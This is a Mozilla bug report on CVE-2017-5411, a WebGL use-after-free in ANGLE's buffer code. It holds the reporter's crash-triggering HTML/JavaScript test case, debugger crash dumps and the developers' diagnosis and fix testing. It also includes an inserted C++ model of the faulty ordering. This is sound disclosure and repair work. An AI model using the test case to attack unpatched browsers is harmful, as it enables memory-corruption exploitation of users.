Closed Bug 1325511 (CVE-2017-5411) Opened 3 years ago Closed 3 years ago

libGLES - Use After Free in Buffer11::updateBufferStorage()

Categories

(Core :: Canvas: WebGL, defect, critical)

53 Branch
x86
Windows 10
defect
Not set
critical

Tracking


RESOLVED FIXED
mozilla54
Tracking Status
firefox-esr45 --- unaffected
firefox51 --- wontfix
firefox52 + fixed
firefox-esr52 --- fixed
firefox53 + fixed
firefox54 + fixed

People

(Reporter: loobenyang, Assigned: milan)

References

Details

(4 keywords, Whiteboard: [post-critsmash-triage][adv-main52+])

Attachments

(5 files)

Reproduction test case:

	<html><body ><canvas id="test"></canvas></body><script>
	var canvas0=document.getElementById("test");
	var gl = canvas0.getContext("webgl2");
	var buffer0= gl.createBuffer();
	gl.bindBuffer(gl.UNIFORM_BUFFER, buffer0); 
	gl.bindBuffer(gl.ARRAY_BUFFER, buffer0); 
	var myImage = new Image();myImage.src = "non.jpg";myImage.onerror = function(){ canvas0.width = "418";} 
	var observer0 =new MutationObserver(function listener1(event) {
	if( typeof listener1.counter == "undefined"){listener1.counter = 0;}
	if(listener1.counter > 3) return;
	listener1.counter++;
	var vertices  = [ 1.0,  1.0,  0.0,  -1.0, 1.0,  0.0,  1.0,  -1.0, 0.0, -1.0, -1.0, 0.0]; 
	gl.bufferData(gl.ARRAY_BUFFER, new Float32Array(vertices), gl.STATIC_DRAW); 
	canvas0.width = "418";
	gl.bufferData(gl.UNIFORM_BUFFER, 2626,gl.STATIC_COPY); 
	}); observer0.observe(canvas0, {attributes: true});
	var timeout0 = setTimeout(function(){  gl.bufferData(gl.ARRAY_BUFFER, 2167,gl.STREAM_DRAW); }, 74);
	</script></html>


Steps to reproduce: 
	1. Open the test case UAF_updateBufferStorage_Repro.html in Firefox browser.


Firefox version: 53.0a1 (2016-12-22) (32-bit)
OS: Windows 10


Stack trace:

	(615c.6088): Access violation - code c0000005 (!!! second chance !!!)
	eax=e5e5e5e5 ebx=11ab9280 ecx=11ab9280 edx=0dc8ba00 esi=11afc280 edi=11afc280
	eip=65181b4d esp=010fdea4 ebp=010fded8 iopl=0         nv up ei pl zr na pe nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
	libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
	65181b4d ff5008          call    dword ptr [eax+8]    ds:002b:e5e5e5ed=????????
	2:059> !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************


	FAULTING_IP: 
	libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
	65181b4d ff5008          call    dword ptr [eax+8]

	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 65181b4d (libGLESv2!rx::Buffer11::updateBufferStorage+0x000000db)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: e5e5e5ed
	Attempt to read from address e5e5e5ed

	FAULTING_THREAD:  00006088

	PROCESS_NAME:  firefox.exe

	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_PARAMETER1:  00000000

	EXCEPTION_PARAMETER2:  e5e5e5ed

	READ_ADDRESS:  e5e5e5ed 

	FOLLOWUP_IP: 
	libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
	65181b4d ff5008          call    dword ptr [eax+8]

	NTGLOBALFLAG:  400

	APPLICATION_VERIFIER_FLAGS:  0

	APP:  firefox.exe

	ANALYSIS_VERSION: 10.0.10240.9 x86fre

	BUGCHECK_STR:  INVALID_POINTER_READ_IN_CALL

	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL

	LAST_CONTROL_TRANSFER:  from 6518175f to 65181b4d

	STACK_TEXT:  
	010fded8 6518175f 010fdefc 11ab9280 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xdb
	010fdf08 65180d5c 010fdf20 00000000 1189ac40 libGLESv2!rx::Buffer11::getBufferStorage+0x85
	010fdf34 65180e2e 010fdf50 00000000 1189ac40 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
	010fdf64 65180cad 010fdf88 00008892 1159b000 libGLESv2!rx::Buffer11::setSubData+0x94
	010fdf94 65213ca0 010fdfbc 00008892 1159b000 libGLESv2!rx::Buffer11::setData+0x29
	010fdfd4 6514a85d 00008892 00000877 1159b000 libGLESv2!gl::Context::bufferData+0x34
	010fdff0 67e716e5 00008892 00000877 1159b000 libGLESv2!gl::BufferData+0x40
	010fe010 682c7787 00008892 00000877 1159b000 xul!mozilla::gl::GLContext::fBufferData+0x1a
	010fe070 682ce0fd 00008892 00000877 1159b000 xul!mozilla::WebGLBuffer::BufferData+0xc3
	010fe0a8 682ce03e 00008892 00000877 1159b000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
	010fe0e0 6817cb2e 00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
	010fe160 672dee29 075a2000 010fe1b8 118db800 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x2d8
	010fe204 672de265 00000000 075a2000 00000000 xul!js::InternalCallOrConstruct+0x5b9
	010fe228 672eb010 075a2000 00000001 11b3d200 xul!InternalCall+0xb5
	010feb68 67864471 010fec80 010fec80 010fec80 xul!Interpret+0x5990
	010febf8 672deb00 075a2000 010fec70 010fed30 xul!js::RunScript+0x231
	010fec94 672cbfb8 00000000 010fedec 075a2000 xul!js::InternalCallOrConstruct+0x290
	010fecbc 672cb707 010fee38 010feed8 010fee08 xul!js::Call+0x81
	010fedb4 671916d5 010feed8 010fee38 010fee08 xul!JS::Call+0x107
	010feeac 67191550 075a2000 010feed8 11ad2adc xul!mozilla::dom::Function::Call+0x14f
	010ff004 6719133d 010ff038 11ad2adc 010ff080 xul!mozilla::dom::Function::Call<nsCOMPtr<nsISupports> >+0xc1
	010ff160 67192647 11ac8520 10f3dce0 11a82010 xul!nsGlobalWindow::RunTimeoutHandler+0x148
	010ff204 67190e54 11ac8520 0000000d 11ac8520 xul!mozilla::dom::TimeoutManager::RunTimeout+0x2b8
	010ff218 672b6373 11a6d910 11ac8520 11a82010 xul!mozilla::dom::`anonymous namespace'::TimerCallback+0x1f
	010ff290 672b62c4 115285c0 115285f4 00000000 xul!nsTimerImpl::Fire+0x9b
	010ff2cc 67193ae0 11a82010 0170e160 090d7a04 xul!nsTimerEvent::Run+0x45
	010ff2f0 67193a63 68f96ac4 010ff36c 67269171 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	010ff2fc 67269171 11ab9240 01704980 6974b601 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
	010ff36c 67194b98 0170e160 6974b601 010ff387 xul!nsThread::ProcessNextEvent+0x14d
	010ff388 672678a7 010ff560 01704970 010ff560 xul!NS_ProcessNextEvent+0x16
	010ff3b0 67c133d1 010ff560 010ff560 00000000 xul!mozilla::ipc::MessagePump::Run+0xcc
	010ff3cc 673454f9 010ff560 c0f8122d 090d7a00 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x58
	010ff404 673454c8 0170e160 00000002 090d7a00 xul!MessageLoop::RunHandler+0x20
	010ff424 67535f2e 01704970 010ff560 010ff444 xul!MessageLoop::Run+0x19
	010ff434 67535cbd 090d7a00 01704970 010ff458 xul!nsBaseAppShell::Run+0x34
	010ff444 68a23084 090d7a00 01704970 090d7a00 xul!nsAppShell::Run+0x26
	010ff458 67c1338f 010ff560 01704970 010ff4a0 xul!XRE_RunAppShell+0x26
	010ff468 673454f9 010ff560 c0f81289 00000003 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x16
	010ff4a0 673454c8 0172a000 00000001 69019200 xul!MessageLoop::RunHandler+0x20
	010ff4c0 68a22d9b 01701040 0000000b 00000000 xul!MessageLoop::Run+0x19
	010ff62c 002b9ce9 0000000b 01701040 010ff64c xul!XRE_InitChildProcess+0x55f
	010ff658 002b7e22 6f1672e4 6f1672ec 013c7298 firefox!content_process_main+0x70
	010ff9e4 002b5e37 0000000c ffcd16c0 013cbd50 firefox!wmain+0x4e92
	010ffa2c 772b38f4 00e4f000 772b38d0 d8aedd39 firefox!__scrt_common_main_seh+0xf9
	010ffa40 77d65de3 00e4f000 d87b03d4 00000000 KERNEL32!BaseThreadInitThunk+0x24
	010ffa88 77d65dae ffffffff 77d8b7e7 00000000 ntdll!__RtlUserThreadStart+0x2f
	010ffa98 00000000 002b5ead 00e4f000 00000000 ntdll!_RtlUserThreadStart+0x1b


	FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp

	FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp

	FAULTING_SOURCE_LINE_NUMBER:  807

	FAULTING_SOURCE_CODE:  
	   803:             latestBuffer = stagingBuffer;
	   804:         }
	   805: 
	   806:         CopyResult copyResult = CopyResult::NOT_RECREATED;
	>  807:         ANGLE_TRY_RESULT(storage->copyFromStorage(latestBuffer, sourceOffset, storageSize, 0),
	   808:                          copyResult);
	   809:         // If the D3D buffer has been recreated, we should update our serial.
	   810:         if (copyResult == CopyResult::RECREATED)
	   811:         {
	   812:             updateSerial();


	SYMBOL_STACK_INDEX:  0

	SYMBOL_NAME:  libglesv2!rx::Buffer11::updateBufferStorage+db

	FOLLOWUP_NAME:  MachineOwner

	MODULE_NAME: libGLESv2

	IMAGE_NAME:  libGLESv2.dll

	DEBUG_FLR_IMAGE_TIMESTAMP:  585bd734

	STACK_COMMAND:  ~59s ; kb

	BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db

	PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db

	FAILURE_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL

	FAILURE_EXCEPTION_CODE:  c0000005

	FAILURE_IMAGE_NAME:  libGLESv2.dll

	FAILURE_FUNCTION_NAME:  rx::Buffer11::updateBufferStorage

	FAILURE_SYMBOL_NAME:  libGLESv2.dll!rx::Buffer11::updateBufferStorage

	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_c0000005_libGLESv2.dll!rx::Buffer11::updateBufferStorage

	ANALYSIS_SOURCE:  UM

	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_in_call_c0000005_libglesv2.dll!rx::buffer11::updatebufferstorage

	FAILURE_ID_HASH:  {7530445f-e192-bd84-04e5-903b912a400c}

	Followup:     MachineOwner
	---------


Variables show that the storage object had been freed:


	storage	0x11ab9280 class rx::Buffer11::BufferStorage *
	 angle::NonCopyable	class angle::NonCopyable
	 __vfptr	0xe5e5e5e5 
	 mRenderer	0xe5e5e5e5 class rx::Renderer11 *
	 mRevision	0xe5e5e5e5
	 mUsage	0n-437918235 (No matching enumerant)
	 mBufferSize	0xe5e5e5e5
	sourceOffset	0
	storageSize	0xa42
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult<rx::Buffer11::BufferStorage *>
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult<enum rx::`anonymous namespace'::CopyResult>
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult<rx::Buffer11::NativeStorage *>
	copyResult	<Value unavailable>
	latestBuffer	0x11afc280 class rx::Buffer11::BufferStorage *
	rx::BufferD3D::mNextSerial	<Value unavailable>
	this	0x11afc280 class rx::Buffer11 *
	 __vtcast_rx::Buffer11::NativeStorage	class rx::Buffer11::NativeStorage
	 rx::BufferD3D	class rx::BufferD3D
	 mRenderer	0x68f8ec90 class rx::Renderer11 *
	 mSize	0x68f8bc90
	 mMappedStorage	0x00000000 class rx::Buffer11::BufferStorage *
	 mBufferStorages	class std::array<rx::Buffer11::BufferStorage *,8>
	 mDeallocThresholds	class std::array<unsigned int,8>
	 mIdleness	class std::array<unsigned int,8>
	 mConstantBufferRangeStoragesCache	class std::map<long,rx::Buffer11::ConstantBufferCacheEntry,std::less<long>,std::allocator<std::pair<long const ,rx::Buffer11::ConstantBufferCacheEntry> > >
	 mConstantBufferStorageAdditionalSize	0
	 mMaxConstantBufferLruCount	0
	 mStaticBroadcastChannel	class angle::BroadcastChannel
	 mDirectBroadcastChannel	class angle::BroadcastChannel
Can't reproduce on a 32-bit 2016-12-22 nightly build on Windows 7. Will try on Win10 tomorrow if someone doesn't beat me to it.
Group: core-security → gfx-core-security
Flags: sec-bounty?
Summary: WebGL - Use After Free in Buffer11::updateBufferStorage() → libGLES - Use After Free in Buffer11::updateBufferStorage()
Is there anyone working on it? It can still be triggered instantly in today's nightly build.

53.0a1 (2017-01-12) (32-bit)

(62e8.44b0): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=117f0800 ecx=117f0800 edx=0d991300 esi=11145b20 edi=11145b20
eip=68f11d48 esp=00d3dc4c ebp=00d3dc80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
68f11d48 ff5008          call    dword ptr [eax+8]    ds:002b:e5e5e5ed=????????
I can't reproduce on Windows 10.  What's your graphics section of about:support?
(In reply to Milan Sreckovic [:milan] from comment #3)
> I can't reproduce on Windows 10.  What's your graphics section of
> about:support?

Screenshot for my about:support has been attached in Graphics_aboutsupport.JPG.

Did you run Windows 10 on a real PC or a virtual machine?
A virtual machine does not have a graphics card, so it might not be able to exercise the WebGL code.
Right - I'm on Windows 10, Intel+Nvidia.
It'd be interesting to see if this is hardware specific, or just intermittent, but given that it happens for you all the time and not for others that started, it could be hardware specific (or at least timing dependent.)
Looking at the stack (recall that "storage" is what shows up freed):

[1] Buffer11::getSystemMemoryStorage calls getBufferStorage with BUFFER_USAGE_SYSTEM_MEMORY
[2] This allocates or sets "storage" from mBufferStorages[BUFFER_USAGE_SYSTEM_MEMORY]
[3] We call Buffer11::updateBufferStorage with storage
[4] Assuming we get into the nested if condition, where we call Buffer11::getStagingStorage()
[5] This calls getBufferStorage with BUFFER_USAGE_STAGINGS
[6] Which eventually calls markBufferUsage with BUFFER_USAGE_STAGINGS
[7] This may call checkForDeallocation with BUFFER_USAGE_SYSTEM_MEMORY

Note that we haven't called markBufferUsage with BUFFER_USAGE_SYSTEM_MEMORY (which would have happened in [1], but only after [3] completes), which means that we haven't called mIdleness[BUFFER_USAGE_SYSTEM_MEMORY] = 0, which means that [7] could decide to deallocate that storage.

And we end up with UAF.

I have no proof of this, I can't reproduce the problem :)

Looben, can you do local builds, or would you mind running a treeherder build I put together for you?
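The call ordering laid out in comment 8, reduced to a small C++ model. This is an added illustration, not ANGLE's Buffer11 and not the fix that landed for this bug; the method names follow the comment, while Renderer11Model, the idle thresholds, the owning pool (which keeps the "released" object readable so the model itself never touches freed memory) and the scenario are constructed assumptions. With the usage marked only after updateBufferStorage returns, the nested staging lookup can age the system-memory storage past its threshold and release it while the caller still holds the raw pointer; marking the usage live before the update keeps the nested check from doing that. The renderer comparison stands in for the assertion the debug build later hit in comment 13.

```cpp
#include <array>
#include <cstddef>
#include <memory>
#include <vector>

// Hypothetical, simplified model of the ordering in comment 8 (added illustration,
// not ANGLE's code). Only the two usages the comment mentions are modelled.
struct Renderer11Model {};  // stands in for rx::Renderer11

enum BufferUsage : size_t { BUFFER_USAGE_STAGING = 0, BUFFER_USAGE_SYSTEM_MEMORY = 1, BUFFER_USAGE_COUNT = 2 };

// Constructed thresholds: staging survives 8 unrelated uses, system memory only 2.
static const unsigned kDeallocThreshold[BUFFER_USAGE_COUNT] = {8, 2};

struct BufferStorage {
    const Renderer11Model *mRenderer;  // the field the debug build's assert compares (comment 13)
};

class Buffer11Model {
public:
    // markFirst=false reproduces the order in comment 8 (usage marked after the update);
    // markFirst=true marks the requested usage live before any nested lookup can release it.
    explicit Buffer11Model(bool markFirst) : mMarkFirst(markFirst) {
        mStorages.fill(nullptr);
        mIdleness.fill(0);
    }

    // Steps [1]-[3]: fetch or allocate the storage for `usage`, then bring it up to date.
    // Returns false when the update ran against a storage that had already been released.
    bool getBufferStorage(BufferUsage usage) {
        if (!mStorages[usage]) mStorages[usage] = allocate();
        BufferStorage *storage = mStorages[usage];  // raw copy, as the real code hands it on
        if (mMarkFirst) markBufferUsage(usage);
        bool ok = updateBufferStorage(usage, storage);
        if (!mMarkFirst) markBufferUsage(usage);
        return ok;
    }
    bool getSystemMemoryStorage() { return getBufferStorage(BUFFER_USAGE_SYSTEM_MEMORY); }
    bool getStagingStorage() { return getBufferStorage(BUFFER_USAGE_STAGING); }
    bool hasStorage(BufferUsage usage) const { return mStorages[usage] != nullptr; }

private:
    // Steps [4]-[5]: a non-staging storage is refreshed from the staging storage, which is
    // fetched through the same getBufferStorage path, so marking and deallocation run underneath.
    bool updateBufferStorage(BufferUsage usage, BufferStorage *storage) {
        if (usage != BUFFER_USAGE_STAGING) getStagingStorage();
        // Real code: storage->copyFromStorage(...), a virtual call through storage's vtable.
        // The debug build asserts renderer == storage->mRenderer at this point (comment 13).
        return storage->mRenderer == &mRenderer;
    }

    // Steps [6]-[7]: reset the idle counter of `usage`, age every other usage and release
    // any storage that has been idle for longer than its threshold.
    void markBufferUsage(BufferUsage usage) {
        mIdleness[usage] = 0;
        for (size_t i = 0; i < BUFFER_USAGE_COUNT; ++i)
            if (i != usage) checkForDeallocation(static_cast<BufferUsage>(i));
    }
    void checkForDeallocation(BufferUsage usage) {
        BufferStorage *storage = mStorages[usage];
        if (storage && ++mIdleness[usage] > kDeallocThreshold[usage]) {
            storage->mRenderer = nullptr;  // models the freed-memory fill (0xe5e5e5e5 in comment 0)
            mStorages[usage] = nullptr;
        }
    }
    BufferStorage *allocate() {
        mPool.push_back(std::unique_ptr<BufferStorage>(new BufferStorage()));  // pool keeps it readable
        mPool.back()->mRenderer = &mRenderer;
        return mPool.back().get();
    }

    bool mMarkFirst;
    Renderer11Model mRenderer;
    std::array<BufferStorage *, BUFFER_USAGE_COUNT> mStorages;
    std::array<unsigned, BUFFER_USAGE_COUNT> mIdleness;
    std::vector<std::unique_ptr<BufferStorage>> mPool;
};

// Constructed scenario: a system-memory storage sits idle while staging is used twice,
// then is requested again. Returns true if that final update touched live storage.
bool runScenario(bool markFirst) {
    Buffer11Model buffer(markFirst);
    buffer.getSystemMemoryStorage();  // allocates both storages
    buffer.getStagingStorage();       // each staging use ages the system-memory storage
    buffer.getStagingStorage();
    return buffer.getSystemMemoryStorage();
}

int main() {
    // comment-8 ordering: the update runs on released storage (false); hardened ordering: true
    return (runScenario(false) == false && runScenario(true) == true) ? 0 : 1;
}
```

In the hardened ordering the system-memory storage is still released once it is genuinely idle, just at a moment when no caller holds its pointer; the model shows the difference is purely one of sequencing, which is why the crash is timing dependent and why a renderer-pointer assertion in a debug build is a cheap way to catch it before the virtual call.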
(In reply to Milan Sreckovic [:milan] from comment #8)
>     Looking at the stack (recall that "storage" is what shows up freed):
> 
>     [1] Buffer11::getSystemMemoryStorage calls getBufferStorage with
> BUFFER_USAGE_SYSTEM_MEMORY
>     [2] This allocates or sets "storage" from
> mBufferStorages[BUFFER_USAGE_SYSTEM_MEMORY]
>     [3] We call Buffer11::updateBufferStorage with storage
>     [4] Assuming we get into the nested if condition, where we call
> Buffer11::getStagingStorage()
>     [5] This calls getBufferStorage with BUFFER_USAGE_STAGINGS
>     [6] Which eventually calls markBufferUsage with BUFFER_USAGE_STAGINGS
>     [7] This may call checkForDeallocation with BUFFER_USAGE_SYSTEM_MEMORY
> 
>     Note that we haven't called markBufferUsage with
> BUFFER_USAGE_SYSTEM_MEMORY (which would have happened in [1], but only after
> [3] completes), which means that we haven't called
> mIdleness[BUFFER_USAGE_SYSTEM_MEMORY] = 0, which means that [7] could decide
> to deallocate that storage.
> 
>     And we end up with UAF.
> 
>     I have no proof of this, I can't reproduce the problem :)
> 
>     Looben, can you do local builds, or would you mind running a treeherder
> build I put together for you?

Sure, please let me know once you done generating  a treeherder build.
This will have the build with the possible fix: https://treeherder.mozilla.org/#/jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1

If that doesn't fix it (or even if it does, to confirm what I think could be happening), this is a debug build that should hopefully assert instead of crashing: https://treeherder.mozilla.org/#/jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256

Give them until tomorrow to be ready :)
(In reply to Milan Sreckovic [:milan] from comment #11)
> This will have the build with the possible fix:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
> 
> If that doesn't fix it (or even if it does, to confirm what I think could be
> happening), this is a debug build that should hopefully assert instead of
> crashing:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
> 
> Give them until tomorrow to be ready :)

Just tried with the win8 64bit op build from  https://treeherder.mozilla.org/#/jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1 with the exact same test case, could not reproduce it.


To make sure, I downloaded a normal 64 bit nightly and can reproduce it:


53.0a1 (2017-01-16) (64-bit)

(4624.405c): Access violation - code c0000005 (!!! second chance !!!)
libGLESv2!rx::Buffer11::updateBufferStorage+0x330:
00007ffe`37fa71e4 41ff5210        call    qword ptr [r10+10h] ds:e5e5e5e5`e5e5e5f5=????????????????
(In reply to Milan Sreckovic [:milan] from comment #11)
> This will have the build with the possible fix:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=2ad6f337c80957834fd20889350566260fda12d1
> 
> If that doesn't fix it (or even if it does, to confirm what I think could be
> happening), this is a debug build that should hopefully assert instead of
> crashing:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=8a2fd7057552da4e240b21688b271cbaff27d256
> 
> Give them until tomorrow to be ready :)

In the given debug build, it did hit an assert:

err: rx::Buffer11::updateBufferStorage(803): 	! Assert failed in rx::Buffer11::updateBufferStorage(803): renderer == storage->mRenderer
Great help, thanks Looben!
Daniel, this is a bug in ANGLE, so possibly reproducible in Chrome as well.  Either way, can you help opening a Chrome security bug and maybe CC one of their security people on this bug, or we can copy the details?
Flags: needinfo?(dveditz)
Looben - when you get the assertion you mention in comment 13, can you post here the full stack it gives you?
Flags: needinfo?(loobenyang)
(In reply to Milan Sreckovic [:milan] from comment #16)
> Looben - when you get the assertion you mention in comment 13, can you post
> here the full stack it gives you?

Sure. But windbg would not resolve symbols of this build, not sure if it's any good for you.



err: rx::Buffer11::updateBufferStorage(803): 	! Assert failed in rx::Buffer11::updateBufferStorage(803): renderer == storage->mRenderer

(2128.5814): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
ucrtbase!abort+0x4e:
00007ffe`837398fe cd29            int     29h
2:061> !analyze -v

FAULTING_IP: 
ucrtbase!abort+4e
00007ffe`837398fe cd29            int     29h

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffe837398fe (ucrtbase!abort+0x000000000000004e)
   ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 0000000000000007
Subcode: 0x7 FAST_FAIL_FATAL_APP_EXIT

FAULTING_THREAD:  00005814

BUGCHECK_STR:  FATAL_APP_EXIT

DEFAULT_BUCKET_ID:  FATAL_APP_EXIT

PROCESS_NAME:  firefox.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  0000000000000007

APP:  firefox.exe

ANALYSIS_VERSION: 10.0.10240.9 amd64fre

LAST_CONTROL_TRANSFER:  from 00007ffe8373b5c1 to 00007ffe837398fe

STACK_TEXT:  
00000082`717fca60 00007ffe`8373b5c1 : 00007ffe`00000003 00000000`00000003 00007ffe`356faa88 00007ffe`356fa240 : ucrtbase!abort+0x4e
00000082`717fca90 00007ffe`8373b8eb : 00000000`00000323 00007ffe`356faa88 00000082`717fcb18 0000020c`0000000f : ucrtbase!`anonymous namespace'::argument_list<char>::expand_if_necessary+0x11e9
00000082`717fcad0 00007ffe`354eb5e8 : 00000082`717fcc00 00000082`717fcb80 0000020c`4d707000 00007ffe`356faa60 : ucrtbase!wassert+0x5b
00000082`717fcb00 00007ffe`354d4943 : 0000020c`3f21de40 00000082`717fcc50 0000020c`3f21de40 00000000`00000000 : libGLESv2!glWaitSync+0x765a0
00000082`717fcbc0 00007ffe`354d9576 : 00000000`00000000 0000020c`3f21de40 00000082`717fcd00 00000000`00000877 : libGLESv2!glWaitSync+0x5f8fb
00000082`717fcc30 00007ffe`354e8612 : 00000000`00000000 00007ffe`2d01f9a5 00000082`717fcd48 00000000`00000000 : libGLESv2!glWaitSync+0x6452e
00000082`717fcc80 00007ffe`354e6047 : 0000020c`4d4f4000 0000020c`3f21de40 00000000`00000001 0000020c`4d4f4000 : libGLESv2!glWaitSync+0x735ca
00000082`717fcd50 00007ffe`35635f1a : 00000000`00008892 0000020c`4d752470 00000082`717fce30 00007ffe`35462321 : libGLESv2!glWaitSync+0x70fff
00000082`717fcda0 00007ffe`3563606e : 00000000`00008892 0000020c`4d4f4000 0000020c`4d752470 0000020c`4d75b000 : libGLESv2!glWaitSync+0x1c0ed2
00000082`717fcdf0 00007ffe`3545af32 : 0000020c`4d75b000 00000000`00000877 0000020c`4d4f4000 00000000`000088e0 : libGLESv2!glWaitSync+0x1c1026
00000082`717fce50 00007ffe`29406851 : 0000020c`4d4f4000 0000020c`4d76e000 00000000`00008892 00000000`00000877 : libGLESv2!gl::BufferData+0x6e
00000082`717fce90 00007ffe`294032ac : 0000020c`4d4f4000 00000000`00008892 00000000`00000877 0000020c`4d3cc858 : xul!PrintJSStack+0x2468b1
00000082`717fcec0 00007ffe`2a3d3246 : 00000082`717fcf30 00000000`000088e0 00000082`717fcf71 0000020c`4d3cc858 : xul!PrintJSStack+0x24330c
00000082`717fcf00 00007ffe`2a3e42bc : 00000000`00008892 0000020c`4d4f4000 ffffffff`fffffffe 0000020c`4d3cc880 : xul!mozilla_dump_image+0xdb6426
00000082`717fcfd0 00007ffe`2a3e412a : 00000000`00000005 00000000`00000000 00000082`717fd110 00007ffe`2c4f0d96 : xul!mozilla_dump_image+0xdc749c
00000082`717fd040 00007ffe`29f3fed8 : 00000000`00000005 00000082`717fd400 ffffffff`fffffffe 00007ffe`00005814 : xul!mozilla_dump_image+0xdc730a
00000082`717fd0c0 00007ffe`2a32d986 : 0000020c`45610088 00000082`717fd440 0000020c`45102000 00007ffe`2d691540 : xul!mozilla_dump_image+0x9230b8
00000082`717fd3e0 00007ffe`2ce7d4a3 : 0000020c`45102000 00007ffe`2a32d7cc 0000020c`4d3cc800 0000020c`45610088 : xul!mozilla_dump_image+0xd10b66
00000082`717fd470 00007ffe`2ce89359 : 0000020c`4d3bf800 00000000`00000000 00000082`717fd528 0000020c`456100a8 : xul!XRE_ParseAppData+0x12e86e3
00000082`717fd4d0 00007ffe`2ce8cdd8 : 0000020c`4d60c240 fffe020c`4ce952e0 0000020c`45102000 0000020c`4cf4712e : xul!XRE_ParseAppData+0x12f4599
00000082`717fd570 00007ffe`2ce96ce2 : 0000020c`45102208 00000000`00000000 0000020c`45102208 0000020c`45102208 : xul!XRE_ParseAppData+0x12f8018
00000082`717fe3e0 00007ffe`2ce89400 : 0000020c`45102000 00000082`717fe558 0000020c`45102000 00000082`717fe618 : xul!XRE_ParseAppData+0x1301f22
00000082`717fe510 00007ffe`2ce7d284 : 00000082`717fe618 fffe020c`4ce8a0c0 00000000`00000000 00000082`717fe550 : xul!XRE_ParseAppData+0x12f4640
00000082`717fe5b0 00007ffe`2c4f1747 : 00000082`717fe728 0000020c`45102000 00000082`717fe8b0 0000020c`45102000 : xul!XRE_ParseAppData+0x12e84c4
00000082`717fe5e0 00007ffe`2a17792e : 0000020c`4d608e40 00000082`717fe8b0 00000082`717fe760 00007ffe`2a330d99 : xul!XRE_ParseAppData+0x95c987
00000082`717fe6e0 00007ffe`29738c88 : 00000082`717feb10 0000020c`4d7a8580 00000082`717fe8b0 00007ffe`2d58b828 : xul!mozilla_dump_image+0xb5ab0e
00000082`717fe860 00007ffe`29769089 : 0000020c`4d3bf108 00000000`00000002 0000020c`4d3bf000 00000082`717feb40 : xul!mozilla_dump_image+0x11be68
00000082`717fea90 00007ffe`2982f394 : 0000020c`4c939b80 0000020c`4d752fb0 00000000`00000000 0000020c`4d753040 : xul!mozilla_dump_image+0x14c269
00000082`717fed10 00007ffe`29831e94 : 0000020c`4d752601 0000020c`4d752620 00004434`00000001 0000020c`4d3bf110 : xul!mozilla_dump_image+0x212574
00000082`717fee60 00007ffe`287a273a : 000001ba`4a76b232 0000020c`4d4f3078 00000000`00000000 0000020c`4d7526b0 : xul!mozilla_dump_image+0x215074
00000082`717fee90 00007ffe`28799066 : 0000020c`4cb63f88 00007ffe`3b273252 00000000`00000001 0000020c`3f214a00 : xul!XRE_AddStaticComponent+0x2674e
